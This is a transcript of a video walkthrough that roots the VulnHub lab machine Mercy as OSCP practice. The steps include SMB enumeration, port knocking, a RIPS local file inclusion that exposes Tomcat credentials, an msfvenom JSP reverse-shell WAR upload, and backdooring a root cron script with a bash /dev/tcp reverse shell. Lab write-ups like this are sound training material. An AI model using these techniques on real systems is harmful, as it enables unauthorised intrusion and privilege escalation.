Welcome back. This is Mike from Digital Offensive, and you're watching my path to the OSCP. Today we're going to take a look at a machine from VulnHub called Mercy. Mercy is developed by the author Donavan. Donavan first posted this VM over into the Facebook group, the OSCP study group over on Facebook, asking for some of the members to take a look at it. The VM Mercy, it really does follow a good deal of what you will see in the labs as far as enumeration goes, post-enumeration, as well as collecting evidence or understanding what you're looking at during your enumeration process, digging deep into the file contents, the configs, to really be able to go from no access to full root access on this machine. This is actually the second version of Mercy that came out. The first version had a little bit of bug in it. After I did the first root of it, I noticed some issues with the SMB connection of it. And so I talked to Donavan. He made some tweaks to it. And he has re-released Mercy again. So if you've already done Mercy before November 20th, 2018, which is today's date, and you're interested in following this video, maybe download the copy again, boot it up, and give it another shot. You're going to notice a couple of different tweaks that actually added one additional step, but that extra step is actually well worth it, as it adds another enumeration step to the process to really start honing your skills. The biggest thing with anything with OSCP related is enumeration. You constantly hear them tell you try harder, try harder. It really comes down to how much you can enumerate. And not only enumerating, right? Because you can run any script out there, but if you don't know what you're running or what the content is that's coming back from the script, it doesn't really matter. You're not going to see the smoking gun or the hint that you need to move forward. So with that being said, let's take a look at Mercy and start going through some of the process. So I already downloaded the VM. It's booted up. It's running on my local VM at 192.168.1.173. And you can see over here I have my notes. Just like anytime I do any of these boot to roots or any hack the box, I always keep really good notes so I know where to come back to later on. It's also great learning. So a couple things with Mercy that I found could definitely help you further down the path as far as my enumeration process goes. Things to remember, things you kind of overlook as you're doing enumeration, and you're going to see them as we go through this. So the first thing I like to do is I run just a simple mmap on the IP. Nothing fancy, just make sure it's up, running, get an idea of what I'm looking at right off the bat. Comes back pretty fast. Two things to note right off the bat here. Port 22 is filtered and 80 is filtered. Why are they filtered? Are they firewalled? Is it some type of port knocking? Is there something else blocking that? Do we need to be connected to the local machine to be able to access it? Is IP restricted? Things like that to think about as we continue our process. We also see DNS running. We see some mail ports. We see SMB, port 445 NetBIOS stuff. Also 8080. So it could be a proxy server, Tomcat, number of different services run on 8080. So now that we have the simplicity ran, let's dig a little bit deeper into our. All right. Excellent. And we can see that our scan has completed. So let's take a look at what we got back here. We can see right away we got a lot of stuff coming back around the SMB enumeration. There's nothing around conflict here. This is great. You'll see some stuff show up here on some of the older Windows machines, which is good to pinpoint for other exploits, but not for Mercy. So we're going to scroll up here. Here's port 8080. So what comes back on 8080 looks like it's Apache Tomcat server. We got some different methods, put, post. Put's kind of interesting, being able to upload a file to the machine. Let's see here, open proxy. Okay, there's a robots.txt that has some disallowed entries. So try harder is an entry that's being hidden. Or we could try that. We could try to go to try harder, and see what comes back on that port. Let's see what else is there. A bunch of stuff around the mail. All right. All right, so we got some additional enumeration coming back. So let's take a look at port 8080 first, right? And what's running on that service. All right, so we come back. It looks like it's a default Tomcat install. It's telling us where we can look for some of the files, some of the configuration about it. We have our manager access down here, which most likely we're going to need a username and password to access, and we do. So we'll hit cancel here for right now, and we'll come back to that in a little bit. What we could try doing right here actually is we could try the default, some of the defaults, Tomcat, secret. It doesn't work. We can also run Metasploit or any other type of brute force tools against this to enumerate through all the default user accounts. Metasploit has a module in it under the auxiliary modules called Tomcat Manager Login. And that'll allow you to enumerate through all the default known Tomcat username password combinations. If you're interested in learning more about that, check out my video over on my YouTube page for Jerry. In Jerry, I do go through using that plugin, and what I'll do is I'll link that plugin below, or that video below, so you can watch that video as well to understand how to use that module. But for right now, I'm going to hit cancel here. And we'll come back to this later maybe, right, if that's our path. So right here we have try harder / try harder. And we get some big long string. It kind of looks like it's base 64 encoded string. So what we can do here is we can copy it. Now there's a great tool I like to use. It's called Decodify, and I'll link the tool down below. What we can do with Decodify, it's found out on GitHub, is basically it will guess or take, it will evaluate the hash or the encrypted text and tell you what type of encryption is, or what type of algorithm it's using, and then it'll try to decrypt it for you. So what we can do here is we can do decode, and then we can paste this in, and we can hit enter, and you can see that I was able to decode from base 64, and it's a message that says, it's annoying, but we repeat this over and over again. Cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list. Once we found the password, so sounds like they did some type of audit, they found the password, quite literally sticking on a post-it in front of an employee's desk. As silly as it may be, the employee pleaded for mercy when we threatened to fire her. So just like in the real world, how many employees write their passwords down on post-it notes? Or you can find them under their keyboards, in their desk drawers, behind the monitor, maybe behind a picture frame, things like that. They put a post-it note with their password on it. There's been a lot of audits that we've done out there where we walk around employees' desks looking for just that. We did one in a manufacturing plant where they actually had the username and passwords on the actual servers as we walk by, so you can quickly copy them down, take pictures of them, and things like that. So doing this type of practice is definitely not good security hygiene. So this is kind of a hint in this box that we at least have the password of a user. Now it says no fluffy bunnies for those who set insecure passwords and endanger the enterprise. So that's what we got so far from the 8080. We know there's Tomcat. We know there's no default credentials on Tomcat. We have a possible password, but at the current time, no user to go with that. We also know SMB is running. So let's take a look at the SMB. So we do enum for Linux 173. Okay. And we see a lot of stuff's coming back already, right? Let's give this a few moments to complete, and then we'll go through this and looking at some information. See if we can get any user accounts in here or any shares we can look at. So it looks like we do have some users right here. We have user plead for mercy, user QIU, user this is a super duper long user, and user fluffy. So we did see a reference to fluffy bunnies earlier with the password in our base 64 decoding, so maybe that could be a user. Let's see what shares we have. Up here we got some shares. We got a default print share, we got a default IBC share, and we have a QIU share. I doubt Fluffy is going to work for QIU, being that there's a QIU user. But hey, if we wanted to test it out, let's just test it out, right? SMB client. You can use SMB map as well. SMB map is actually nice when you get it working. You'll see a directory output of everything. I'm more familiar with SMB client, and I feel more comfortable with this tool. It's a little bit more manual in the process, but it still works. All right. So we're going to do QIU. We're going to try the user Fluffy first with the password. As I said, I don't think it's going to work, being that it's a QIU and there's a QIU user, but hey. All right, so this is walking us through our normal enumeration process, right? We saw a reference to Fluffy Bunnies, we saw a password, we saw some shares, and we just want to validate it's not that. Now the next one we can definitely do is use the user QIU with the password. And you can see that we're now connected to SMB share. So if we do a directory listing of this, we have the bash history. There's a private folder, the bash logout cache. So we can download these files. So like we can do get.bash_history, which is great because we may see him mistype his password somewhere in here. He may be running different scripts. There may be some clues of the next level of access here. So we'll do get bash_history. And let's cd into private and see what's in there. So in private, we have a directory called open says me, a directory called secrets, and a file called readme. So let's do get readme, that text. Let's cd in secrets. There's nothing in secrets. So let's cd into open says me, do a dir there. And here we got two files. We got a config print and a config. So let's grab those two. And get config. All right. Now we downloaded all these interesting files. Let's take a look at them on our box. All right. So the first one we downloaded was, all right, we have the bash history. So let's do a cat.bash history. So we can see some of the stuff he's done going in and out of the folders. Looks like config print might actually be a shell script that he's running or some other type of script that he's running. So let's see here. We got config. So let's do cat config. Now this is a pretty big config file here. It says for other details of Mercy, please contact your system administrator. Let's scroll through this. So it looks like it's a part of a Samba config. So you have your shared definitions down here for that configuration. You get some misinformation up here for Samba still domain. Interesting. So here it looks like we kind of have some Apache information. Now, right here we have the directories for Apache. Sets the default security module of Apache TV HTTP server. It does not allow access to the root file system outside of user/share and var/ww. So we should be able to browse to these two directories to find information. This one's kind of important here, user/share, because the default installs a Tomcat 7 store files out in user/share. So one of the file types that stores out there is the user.xml, which usually carries the user, the username and passwords of the users to be able to log into Tomcat. And if we're able to log into Tomcat, then we would be able to upload our WAR file and get a web shell through that method. So let's continue looking through here. What else we got? And then the next part we come up to is the port knocking, it looks like. So originally we saw port 80 and port 22 closed out, filtered, and looks like based on this configuration, we're able to enable them through a simple TCP port knock. So in there, if we go to the IP address on port 159, then the IP address on port 27391, and then the IP address on port 4, it should open up port 80 for us to be able to access it. And then the same thing for SSH on these ports. Now, unlike a lot of the other port knock challenges I've seen out there, this one doesn't close after your first visit to it. This one closes out only if you close it out. So they actually have a close sequence too for HTTP and SSH. This is nice because there's been several boxes on Hack the Box where you use port knocking, you open up the port, but as soon as you touch the port closes, and then you have to reopen the port. It gets a little frustrating that way. So this is nice that the box keeps the ports open for you. So first thing let's open up these ports and see if we find any additional information here. I downloaded a great tool called Knock. You can do port knocking simply with Netcat or just simple connections outbound. This tool, Knock, you can find it out on GitHub. I'll link it below in the video description. Knock allows you to just enter Knock, the IP address 192.168.1.173, and then the ports, all in a row with no commas or anything between. And then we hit enter. All right. So now in theory, if we do an mmap, we do now see that HTTP is open on the box. So before we can do, let's do a Derby, and then we'll do other enumeration about Derby. So off Derby. So we're going to enter Derby HTTP://192.168.1.173. We're going to enter the path to the word list. We're going to use the common word list. It's a little bit bigger than the small. You have small, common, you got big, and you got a multitude of other word lists that's available for you. If you want to see what other word lists are available for Derby, just CD out to that directory and take a look. There's other tools out there, such as GoBuster, Dirtbuster, so on and so forth that you can use. Derby is just a little small, quick tool. So we kick that off with that run. So you see it's coming back with some information. We have index.html, robots.txt, server status with a 403, so we can't get there in time. So let's open robots.txt. So it looks like there's two directories that it's hiding from us. There's mercy and no mercy. So if we go out to mercy, we get a directory listing that says, welcome to mercy. We hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow visitors to obtain more than just the local time of our system. So it sounds like there might be some type of time application that may give the visitors of the website the local time. And if we see over here, we do have a /time that came back. So let's open this up. So if we open this up, it looks like the system time is Wednesday, November 21st, which is correct based on the time zone. Time check accuracy of Linux. So basically it looks like somehow it's getting the local time from the Linux machine and echoing out to this file. And then when we access this web page, we get this display. So we also had one other directory that came back. It was No Mercy. So if we go to No Mercy, and I'm going to blow this up so you can see this, we get this web application here. And not knowing too much about this web application, I went out and Googled RIPS 0.53, which is actually a static source code analysis tool that's vulnerable to a local file inclusion attack. So we can use this to basically browse the file system to access different files. So if we use this tool, and actually let's bring up the vulnerability so I can show you we would search for RIPS 0.53, multiple local file inclusions come back. If you look down here, you can see that we're able to browse Etsy password and other data out there. So first thing we can do is we can actually test it out and try to browse to the Etsy password file, right? So it's not stored in the RIPS directory, so we're just going to copy up to the Windows here. We're going to come back over here. There's going to be No Mercy. We're going to paste. We delete this slash here. We hit enter. And lo and behold, we get the contents of Etsy password back. This is great. But what else can we do with this? Well, we know there's a Tomcat server listening. We know it has default configurations. And it tells us where the user.xml file is. So we can actually probably browse to that Tomcat user.xml file, read the contents, and possibly get an admin to log into Tomcat to escalate our shell. So we're going to use this URL here. We have our IP. We're going to go to user/share/var/lib/tomcat7 conf tomcat-user.xml. So if we hit enter here, we come back. You can see down here, role name equals admin GUI, role name equals manager GUI, username equals this is a super duper long user, password equals heartbreak is inedible, inevitable. Role equals admin-GUI and manager GUI. And then we have another one here, Fluffy, with freakish Fluffy Bunny. But he has no roles. But we still have, this also tells us that there might be a user with the password freakish Fluffy Bunny. And actually, let's actually try to use this user account right here to log in to Tomcat and see if we can upload our war. Okay, we're able to use the user. This is a super duper long user and that password, and it logs us in. So now that we're logged in, we can upload our shell. So we're going to select our war file. Now to create this war file that we're going to upload, we're going to use MS Venom. We're going to use the syntax MS Venom with the payload Java /JSP _ shell _ reverse _ TCP. We're going to provide the local host of 192.168.1.6 and the port of 443. I like to use 443 to help bypass firewalls and other type of restrictions. This doesn't always work well on firewalls that are able to do application inspection because they'll say, hey, this is not a true HTTP connection, and it'll still possibly block it. But in most of these capture the flags, OSCP type of events, you're able to use ports like this to help circumvent some controls. Then we're going to output the file as a war file, and the file type is going to be war, and we're going to output it into my file genxweb.war. If you're interested in learning more about different MS Venom payloads, NetSec has a bunch of them out on his blog. I'll make sure I link his blog below, and you can check out a whole bunch of different things you can do with the MS Venom tool in creating payloads. So we executed that already, and we created genxweb.war. So we're going to open this up. We're going to deploy it. Now that that's deployed out there, we're going to launch our MS console. You can use Netcat to catch it too. Either works. You can do a netcat-lvp listen on port 443, and you get your shell that way, or you can use Metasploit and basically use the exploit multi-handler to catch it. So we're going to use exploit multi-handler. And the cool thing about Metasploit is as you use it, your history gets saved. So you just hit the up arrow and you can select the options you want. Set payload. So we're going to set our payload. We're going to set our L host. And we're going to set our L port. At this point, we can type in exploit, and now it's running. You can also type in run if you want. Over on the Tomcat, we're going to see that we uploaded our application, GenXWeb. We're going to click it. It's going to execute, and over here you can see that we got a shell. So now that we have a shell, what can we do? All right, so we're the user Tomcat. We know the shell is working. I like to spawn a new TTY. If you go out to NetSec's blog, he also has a great how-to on spawning TTYs. This is great too if you want to possibly check for sudo or other things, or just have a nicer looking shell out there. So go out here. Usually Python works well. If Python's not installed, you can try bin/sh-i or a number of different ones to try out, see which one works for you. So we're going to spawn a shell. You see now that we have that $sign. So at this point, we know we're the user Tomcat. And we also know that we might have a user, well, we do know we have the user Fluffy because I just showed you that we have Fluffy. We could try to access Fluffy here. We could do a su Fluffy. And from here, we could type in the Fluffy's password, was freakish, Fluffy Bunny. And if we do ID now, we are now Fluffy. This is great. So now we at least have a true user on the box. We're not stuck in a web shell, so we can do some additional enumeration. First thing we can do is we can download enum or Linux Proof Checker, or whatever tool you're more familiar with. Sometimes they download both. They wget http://192.168.1.6/linenum.sh. So we download our linenum. Okay, so we're going to run enum right now. All right, excellent. So enum is done running. And let's take a look through here. It looks like MySQL is running. Maybe we can find a MySQL in the web directory, but I didn't see any configuration files out there that are tied to MySQL to look at that. All right, so nothing really interesting, super interesting in this inline enum. Let's go to some manual enumeration of this box and see what we have. So we're the user Fluffy currently, right? Let's see what Fluffy has in their home directory. So we do a ls-lai, basically shows us all this output. We have the users, groups, permissions, shows us all hidden files as well. We have our bash history, so we do cat.bash history. So nothing really interesting is his bash history. We do have a private folder, kind of like what we had back on the QIU user. So let's cd in there and see what's interesting in that folder. And there's a secrets folder. Now on the other user, that folder is empty, but let's see what's in this folder on this guy if he has anything. So here we have backup.save, .secrets, and time clock. And time clock's kind of interesting for two reasons. One, we saw a web page that mentioned about time, and if we can alter the time, maybe we can get more out of it. So there's some type of script that's running a local time command and outputting it to that web directory. So this script is owned by root. It is world readable and writable. So we can add content to that, and then it looks like the root user would run it. So let's take a look at these other files. So cat backup.save. So it just echoes backing up files. Cat.secret. Try harder, right? Whoop-de-doo. Typical OSCP output. And let's do a cat time clock. So in cat time clock, we can see it's a bash shell script. So setting the now variable to the date, it's going to echo that out to that file/time. The time courtesy of Linux, output at the time, and then it's going to change the owner to www.data, which is basically the web user that Apache is running as. So for that to happen, it has to be executed by root for that permission to be changed. Fluffy is not going to have the access to do that. And actually, let's just double check, right? So let's do a sudo-l. We type in freakish, Fluffy, bunny, and yeah. So Fluffy has no sudo access on this box. So no super user access. That sudo-l is one of my favorite things to run on most boxes right away. A lot of the capture flags I've done recently on Hack the Box, as well as a couple of things I've seen in different labs. That sudo-l is a lifesaver. A lot of times that is your path to getting where you need to be. We know there's some type of process running that's executing this time clock. There's another great tool we can take a look at. It's called Process Spy. You can find that on GitHub as well. And basically, as an unprivileged user, we can spy on the processes to see what's running in the background. Now, the one caveat with this tool is it takes some time for output to start showing up. So, okay, so let's download the Process Spy tool. All right. Now, as I said, it's located on GitHub. I already have a file stored on my local HTTP server. I keep a lot of my tools that I want to dump on my victim machines out of my web directory so I can quickly access them through wgets, curls, HTTP invokes on PowerShell, whatever I need to pull those tools across. But I just host my own web server, so I know they're all there. I know I can quickly access them. I don't have to go out to the internet, worry if they're Trojaned, worry about if they're available or not. I just go out to my own server and grab it. So we grab that tool. PSPY32. All right. So we're going to take a look at this running now. Another caveat of this tool is you really got to understand the processes you're seeing, right? So we're interested in anything that's running as UID 0, that's root. These other IDs are other users, other services. So this seems to be the base output right now. So let's hit enter a few times just so we have like a screen here. So anything new that comes. Actually, we let this run for a few moments now, and we start to get some output here. So what we're seeing is there's a cron job that kicks off. And what we can see in the cron job is we can see that chown www data, the var slash HTML, var www HTML time. So it's executing that bash slash home fluffy, that private secrets time clock. And it's being executed by root. So we know that root is running this in a cron every few moments. This took about maybe 5 minutes or so, a little bit longer to collect the data. You could have went initially with your gut feeling of, hey, this is world writable, root has access, let me backdoor this and execute it. But just for enumeration process, to give you guys an idea of some other stuff you can do, I wanted to show you the process spy, let that run so you can see the output you can get. As I said, this is a great tool for capture flags, for anything actually in the real world as well. If you get on box, you don't know what's going on, you can let process spy run for a bit and gain some information. So now that's running, let's kill it. We're the Tomcat user again. So based on what we just saw in the process spy output, we know that file gets executed by root every few minutes. So let's go into CD that private, right? CD into secrets. And let's backdoor our time clock. So time clock is the bash file. Now, one of the things we can see here is we can use netcat. We can use a whole bunch of different things to do here. We can basically have it make the pass WD file writable. So we can basically change our user group and user ID to 0 ourselves. So we can use the fluffy user as root. We can spawn an outbound shell to ourselves. We can have a created user, modify a user, basically whatever we want. But for simplicity in this lab, in this capture flag, let's just shovel a shell out to us. Now we did see netcat was installed in this box earlier in our Linux lin enumeration process, but most netcats these days don't have that -e available anymore, where it allows you to execute different programs. So when you connect, you get that program. So just to verify, if we do it at netcat, right, we don't see a -e as a flag. So there's another great URL. I'll have it in the link below. And basically, it is netcatting without netcat. And over on Landmaster 53, there's a bunch of different examples of this. So I'll paste this URL in the description below. But what we're going to use here is we're just going to use, we're going to execute the command bin/bash-i. So we're going to get our bash shell, interactive bash shell. That's what the -i is. And we're going to use our dev TCP socket to shovel it over to ourselves. So this whole command here will echo this command into that file. So let's copy that. There's our time clock. So we're going to enter, paste, enter. Now if we do cat time clock, you can now see our command at the very bottom. So what we want to do now is we want to come over here. We're going to do a new window. We're going to do an nc-lvp 9090 and let this run. And you can see instantly we caught the root process. So now we're root on Mercy. And in here we have a couple of files we can check out. We can do cat config. And basically this is the same config we saw earlier. Cat proof. Congratulations on rooting Mercy. And cat author author secret. So this is a little dedication. You wrote, hi, congratulations on being able to root Mercy. The author feels bittersweet about this box, so on and so forth, right? That is a pretty quick walkthrough. We cover some pretty cool enumeration processes. We look at SMB, Tomcat, Apache. We used the LFI exploits on the RIPS static code analysis. We did a little bit of password cracking, or at least maybe encryption cracking with the base64 using Decodify. Nothing seriously, but we got to use a lot of tools throughout this, and what I'm going to do is I'm going to link all the tools we use below so you guys can have a link to the tools and decide if you want to use them yourself. There's other ways to use do those methods, as I said, like the port knocking. You could use netcat. Instead of using decodify for the base64, you can use base64.org to decode it, or you can even echo that file out to the base64 command that's built into Linux and get the output as well, or Python, whatever your cup of tea is. But these tools also give you an understanding of tools to use if you don't know what encryption is, or you don't know how to do port knocking manually, or you didn't know how to look at processes without the process spy. All these tools can be added to your arsenal to help your chances at the OSCP, but also your chances at other things, hack the box, or just real life in general. I keep a repo of all the tools I use, so every time I build a new machine, I quickly download all my tools and do an update of them all. So I have them all installed on my machine, so I quickly can use them. All right, so there you have the box is now rooted. Altogether, it was a great box. It really did flow really well with the enumeration process. The little hints gave you ideas where to dig a little bit further, different areas. It made you think about what you've seen in the past to apply to the next step in the process to get roots. Altogether, I give it a thumbs up. I like the box a lot. As I said, Donavan was very helpful during the process. After I got the initial root, I wanted to create a video, but there's some bugs. He did re-release the box, as I said earlier, and the new flow even worked, I think, a little bit better than the previous flow. It gave you an extra layer of enumeration that you needed to go through to get to where you needed to be at the end. If you like these videos, make sure you give it a thumbs up. Subscribe to my channel. If you click the notification bell at the top, you'll be notified every time a new video comes out. I'm releasing new videos about once a week, once every 2 weeks, give or take. I do have some thoughts about some content for upcoming videos. I'm still working through it. It all depends how the weather holds up and whether the box is getting retired soon. So make sure you definitely subscribe to be updated as new videos come out. All the links of the tools I used in this will be linked below, as well as my social media. Find me on Twitter and LinkedIn. I am on Facebook. I only accept friend invites from people I know personally on Facebook, just because I share a lot of stuff with about my family out on Facebook. So I don't leave that open to the general public. But I said, follow me on Twitter, follow me on LinkedIn, of course on YouTube as well. If you're looking for any good books or material to understand web hacking or red teaming or anything in general, I have a few links below to my Amazon affiliates. You'll be able to find some great pricing. Right now, the Red Team Handbook is on sale for $9. If you click that link below, you'll be able to purchase it at that price. There's also some cool swag with the holidays coming up. Cali sweatshirts are out there. You click on their link, purchase it as well. Make sure you head over and download Mercy from VulnHub. If you haven't already, check it out. As I said, it's a great box. If you're really looking for a way to understand the OSCP methodologies, or just the enumeration steps in general, it really forces you to understand how to enumerate to get through the box. Definitely download it, check it out. Give Donavan a thumbs up. Check him out over on the OSCP forums as well. If there's anything you guys like to see in general, make sure that you guys comment below so I can have an idea of some of the content you would like to see. Once again, thank you. I hope you enjoyed this video and have a